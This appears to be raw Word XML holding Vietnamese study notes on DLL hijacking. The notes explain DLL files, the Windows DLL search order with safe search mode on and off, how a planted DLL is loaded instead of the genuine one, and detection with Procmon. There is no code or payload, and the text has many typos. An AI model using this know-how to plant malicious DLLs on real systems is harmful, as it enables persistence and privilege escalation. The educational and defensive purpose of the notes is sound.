        <w:t>Têp DLL hoặc tệp thư viện liên kết đông chứa các tài nguyên mà ứng dụng cần để chạy thành công. Chúng có thể bao gồm hình ảnh và thư viện các hàm thực thi Nguời dùng cuối không thể mở tệp dll chúng chỉ co thể được mở bằng ứng dung được liên kết cua họ điều này thường xảy xa khi ứng dụng khơi động Hệ thống Windows yêu cầu tệp DLL để hiêu cach sử dụng tài nguyên của chúng, host computer mem và dung lượng ổ cưng hiệu quả nhất Các tệp DLL thương kết thúc bằng phần mở rộng .dll nhưng một số có thể là .drv, .drov or .exe Một tệp dll duy nhất có thể chạy nhiều chương trinh vì vậy nhiều chương triìh có thể bị bao gồm trong một cuộc tấn công chiếm quyền điều khiên dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A9B8DF" w14:textId="460AC48C" w:rsidR="00BF73E0" w:rsidRDefault="00BF73E0" w:rsidP="00BF73E0">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>DLL Hijacking là gì?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2622FC56" w14:textId="2187BA72" w:rsidR="00BF73E0" w:rsidRDefault="00BF73E0" w:rsidP="00BF73E0">
      <w:r>
        <w:t>Là một phương pháp tiêm mã độc vào ưng dụng băng cách khai thác một sô ứng dung Windows tìm kiếm và tải Dynamic Link Lirbraries(DLL) - thư viện liên kết đông Chỉ hệ điều hành của Microsoft mới dễ bị xâm nhập DLL Bằng cach thay thế tệp DLL bắt buộc bằng một phiên bản bị nhiễm và đăt nó trong cách tham số tìm kiếm cuủ ưng dụng, tệp bị nhiễm sẽ đươc gọi khi ứng dụng tải, kich hoạt các hoat động độc hại của nó Để xâm nhập DLL thành công, nan nhân cần tải tệp DLL bị nhiễm từ cùng thư mục với ứng dụng được nhắm mục tiêu Nếu cac ứng dụng được tải tự động khi khởi động bị xam nhập với tệp DLL bị nhiễm độc, → hacker sẽ được cấp quyền truy cập vào máy tính bị nhiễm bất cứ khi nào load DLL chiêm quyền điều khiên không phải là một phương pháp tấn công mạng tốt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F086F7E" w14:textId="50137C11" w:rsidR="00BF73E0" w:rsidRDefault="00BF73E0" w:rsidP="00BF73E0">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>DLL Hijacking hoạt động?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3AEBAA" w14:textId="158BA3EB" w:rsidR="00E26631" w:rsidRDefault="00E26631" w:rsidP="00E26631">
      <w:r>
        <w:t>Để một cuộc tấn công chiếm quyền điều khiển DLL thành công, ứng dụng Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>cần được lừa dể mở một tệp dll bị nhiễm thay vì dll hợp lệ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7936DA75" w14:textId="0DE91DC5" w:rsidR="00E26631" w:rsidRDefault="00E26631" w:rsidP="00E26631">
      <w:r>
        <w:t>Bằng cach khai thác thứ tự tìm kiếm DLL công khai của các ứng duụg Microsoft, thủ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>thuật này tương đối đơn giản dể thực hiện</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC0CE20" w14:textId="31FD9463" w:rsidR="00E26631" w:rsidRDefault="00E26631" w:rsidP="00E26631">
      <w:r>
        <w:t>Thứ tự tìm kiếm DLL tiêu chuân của các ứng dụng Microsoft phụ thuộc vào viêc tìm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>kiêm DLL an toàn có đc bật hay không</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BA0A35" w14:textId="5E755F2C" w:rsidR="00E26631" w:rsidRDefault="00E26631" w:rsidP="00E26631">
      <w:r>
        <w:t>Khi chế độ tìm kiếm DLL an toàn được bật, các ứng udnjg sẽ tìm kiếm các tệp DLL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>cần thiết theo thứ tự:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2426677A" w14:textId="77777777" w:rsidR="00E26631" w:rsidRDefault="00E26631" w:rsidP="00E26631">
      <w:r>
        <w:t>1. Thư mục mà ứng dụng được tải từ đó</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705C6D16" w14:textId="77777777" w:rsidR="00E26631" w:rsidRDefault="00E26631" w:rsidP="00E26631">
      <w:r>
        <w:t>2. Thư mục hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D1E6EB" w14:textId="77777777" w:rsidR="00E26631" w:rsidRDefault="00E26631" w:rsidP="00E26631">
      <w:r>
        <w:t>3. Thư mục hệ thống 16 bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23949E03" w14:textId="77777777" w:rsidR="00E26631" w:rsidRDefault="00E26631" w:rsidP="00E26631">
      <w:r>
        <w:t>4. Thư mục Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177EAE5C" w14:textId="77777777" w:rsidR="00E26631" w:rsidRDefault="00E26631" w:rsidP="00E26631">
      <w:r>
        <w:t>5. Thư mục hiện tại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F3CE05" w14:textId="77777777" w:rsidR="00E26631" w:rsidRDefault="00E26631" w:rsidP="00E26631">
      <w:r>
        <w:t>6. Các thư mục được liệt kê trong biến môi trường Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31338469" w14:textId="77777777" w:rsidR="00E26631" w:rsidRDefault="00E26631" w:rsidP="00E26631">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Khi chế độ tìm kiếm DLL an toàn tắt, thứ tự tìm kiếm sẽ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206B8DE2" w14:textId="77777777" w:rsidR="00E26631" w:rsidRDefault="00E26631" w:rsidP="00E26631">
      <w:r>
        <w:t>1. Thư mục mà ứng dụng được tải từ đó</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592ED37E" w14:textId="77777777" w:rsidR="00E26631" w:rsidRDefault="00E26631" w:rsidP="00E26631">
      <w:r>
        <w:t>2. Thư mục hiện tại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7474720B" w14:textId="77777777" w:rsidR="00E26631" w:rsidRDefault="00E26631" w:rsidP="00E26631">
      <w:r>
        <w:t>3. Thư mục hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32481811" w14:textId="77777777" w:rsidR="00E26631" w:rsidRDefault="00E26631" w:rsidP="00E26631">
      <w:r>
        <w:t>4. Thư mục 16 bit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D018A0" w14:textId="77777777" w:rsidR="00E26631" w:rsidRDefault="00E26631" w:rsidP="00E26631">
      <w:r>
        <w:t>5. Thư mục Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168B75B0" w14:textId="05E2B18C" w:rsidR="00E26631" w:rsidRDefault="00E26631" w:rsidP="00E26631">
      <w:r>
        <w:t>6. Thư mục được liệt kê trong biến môi trường Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C20A3E" w14:textId="6452D4D9" w:rsidR="00E26631" w:rsidRDefault="00E26631" w:rsidP="00E26631">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Cách xác định một cuộc tấn công DLL Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BC8849" w14:textId="3BF875E3" w:rsidR="00E26631" w:rsidRPr="00E26631" w:rsidRDefault="00E26631" w:rsidP="00E26631">
      <w:r>
        <w:t>sử dụng Procmon của windows Procmon hiển thị tất cả các hệ thống tệp đang được tải trong thời gian thực. Bằng cách áp dụng các bộ lọc phù hợp, có thể xác định xem có tệp dll khả nghi nào đang được tải thay vì tệp gốc hay không</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3020CA28" w14:textId="57E33FB6" w:rsidR="00BF73E0" w:rsidRDefault="00BF73E0" w:rsidP="00BF73E0">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>DLL Search Order Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441016F6" w14:textId="26BB12CB" w:rsidR="00BF73E0" w:rsidRDefault="00BF73E0" w:rsidP="00BF73E0">
      <w:r>
        <w:t>Adversaries có thể thực hiện các malicious payloads bằng cách cuơp thứ tự tìm kiêm được sử dụng để load các tệp DLL. Hệ thông windows sử dụng một phương pháp chung để tìm kiếm các tập dl cần thiết để load vào một chương trình. Hijacking dll load có thể nhằm mục đich thiết lâp tinh bền bỉ cũng như nâng cao đặc quyền và trốn tránh các hạn chế đối với việc thực thi tệp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CCCCCF" w14:textId="77777777" w:rsidR="00BF73E0" w:rsidRPr="00BF73E0" w:rsidRDefault="00BF73E0" w:rsidP="00BF73E0">
      <w:pPr>
        <w:sectPr w:rsidR="00BF73E0" w:rsidRPr="00BF73E0" w:rsidSect="000E17EF">
          <w:footerReference w:type="default" r:id="rId37"/>
          <w:pgSz w:w="11900" w:h="16840"/>
          <w:pgMar w:top="1420" w:right="1320" w:bottom="860" w:left="1340" w:header="0" w:footer="576" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="381"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="095173D7" w14:textId="77777777" w:rsidR="002D4A21" w:rsidRPr="001B00D7" w:rsidRDefault="002D4A21" w:rsidP="001B00D7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DE9DD74" w14:textId="77777777" w:rsidR="001B00D7" w:rsidRPr="001B00D7" w:rsidRDefault="001B00D7" w:rsidP="001B00D7">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US" w:eastAsia="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="459BB69F" w14:textId="77777777" w:rsidR="00665E18" w:rsidRPr="001B00D7" w:rsidRDefault="00665E18">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US" w:eastAsia="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00665E18" w:rsidRPr="001B00D7" w:rsidSect="00E74932">
      <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
      <w:pgMar w:top="720" w:right="1008"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3FEF" w14:textId="77777777" w:rsidR="006674B9" w:rsidRDefault="006674B9" w:rsidP="00782BE4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6808ADD0" w14:textId="77777777" w:rsidR="006674B9" w:rsidRDefault="006674B9" w:rsidP="0078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MS Gothic"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>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04291"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="419700C0" w14:textId="05D2D4DF" w:rsidR="000E17EF" w:rsidRDefault="000E17E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B5FCB94" w14:textId="03A73997" w:rsidR="00D70735" w:rsidRDefault="00D7073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C543" w14:textId="77777777" w:rsidR="006674B9" w:rsidRDefault="006674B9" w:rsidP="00782BE4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="136A2DF6" w14:textId="77777777" w:rsidR="006674B9" w:rsidRDefault="006674B9" w:rsidP="0078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885"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="989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0DB1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EFF2B0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C351D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="04523D36"/>
    <w:lvl w:ilvl="0" w:tplc="2F4499A6">
      <w:start w:val="2"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:eastAsia="Liberation Sans" w:hAnsi="Wingdings"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05F7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0B6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0B4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9BA6CDE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1B95"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B8C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E89"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7F38F262"/>
    <w:lvl w:ilvl="0" w:tplc="B30A17E2">
      <w:start w:val="12"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:eastAsia="Liberation Sans" w:hAnsi="Wingdings"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24854"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E7E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534B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5ABC42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338A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EEB084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7372782"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E26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4F9C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9482BD2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8F6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="12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1FB4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="00B6C1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13E4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AC7CB570"/>
    <w:lvl w:ilvl="0" w:tplc="042A0001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="779634B8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="1D0A662E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:eastAsiaTheme="minorHAnsi"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870D16"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="481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B4800"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F8B005BC"/>
    <w:lvl w:ilvl="0" w:tplc="779634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466803"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="553EB5A0"/>
    <w:lvl w:ilvl="0" w:tplc="042A0001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="779634B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E8875B9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="148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14"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="8"/>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12"/>
    <w:rsid w:val="00052672"/>
    <w:rsid w:val="000E17EF"/>
    <w:rsid w:val="000F3179"/>
    <w:rsid w:val="0011015E"/>
    <w:rsid w:val="001311A7"/>
    <w:rsid w:val="001B00D7"/>
    <w:rsid w:val="002D4A21"/>
    <w:rsid w:val="0062060F"/>
    <w:rsid w:val="00630F20"/>
    <w:rsid w:val="00665E18"/>
    <w:rsid w:val="006674B9"/>
    <w:rsid w:val="006A7B3A"/>
    <w:rsid w:val="00773012"/>
    <w:rsid w:val="00782BE4"/>
    <w:rsid w:val="007A05EF"/>
    <w:rsid w:val="007B1F51"/>
    <w:rsid w:val="008D4626"/>
    <w:rsid w:val="009508B5"/>
    <w:rsid w:val="00A27DF0"/>
    <w:rsid w:val="00AA7210"/>
    <w:rsid w:val="00AB32F0"/>
    <w:rsid w:val="00B841A8"/>
    <w:rsid w:val="00B95912"/>
    <w:rsid w:val="00BF73E0"/>
    <w:rsid w:val="00D70735"/>
    <w:rsid w:val="00D86A02"/>
    <w:rsid w:val="00E15BA2"/>
    <w:rsid w:val="00E26631"/>
    <w:rsid w:val="00E74932"/>
    <w:rsid w:val="00E93904"/>
    <w:rsid w:val="00FA57C3"/>
    <w:rsid w:val="00FD014E"/>
    <w:rsid w:val="00FD2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E206"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{24F8921C-78DA-47B7-AA15-BF2E48A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2"/>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1311A7"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="0"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="202124"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="1"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D86A02"/>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link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00773012"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="auto"/>
      <w:sz w:val="27"/>
      <w:szCs w:val="27"/>
      <w:lang w:eastAsia="vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00BF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11A7"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="202124"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="00D86A02"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00773012"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00773012"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="auto"/>
      <w:sz w:val="27"/>
      <w:szCs w:val="27"/>
      <w:lang w:eastAsia="vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00773012"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:color w:val="auto"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="008D4626"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00782BE4"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubtleEmphasis">
    <w:name w:val="Subtle Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:rsid w:val="00782BE4"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007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E4"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007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E4"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList1">
    <w:name w:val="No List1"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002D4A21"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="002D4A21"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="100"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Sans" w:eastAsia="Liberation Sans" w:hAnsi="Liberation Sans" w:cs="Liberation Sans"/>
      <w:color w:val="auto"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="002D4A21"/>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Sans" w:eastAsia="Liberation Sans" w:hAnsi="Liberation Sans" w:cs="Liberation Sans"/>
      <w:color w:val="auto"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="002D4A21"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:before="68" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="100"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Sans" w:eastAsia="Liberation Sans" w:hAnsi="Liberation Sans" w:cs="Liberation Sans"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="auto"/>
      <w:sz w:val="41"/>
      <w:szCs w:val="41"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:uiPriority w:val="1"/>
    <w:rsid w:val="002D4A21"/>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Sans" w:eastAsia="Liberation Sans" w:hAnsi="Liberation Sans" w:cs="Liberation Sans"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="auto"/>
      <w:sz w:val="41"/>
      <w:szCs w:val="41"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableParagraph">
    <w:name w:val="Table Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="002D4A21"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Sans" w:eastAsia="Liberation Sans" w:hAnsi="Liberation Sans" w:cs="Liberation Sans"/>
      <w:color w:val="auto"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00BF73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348">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
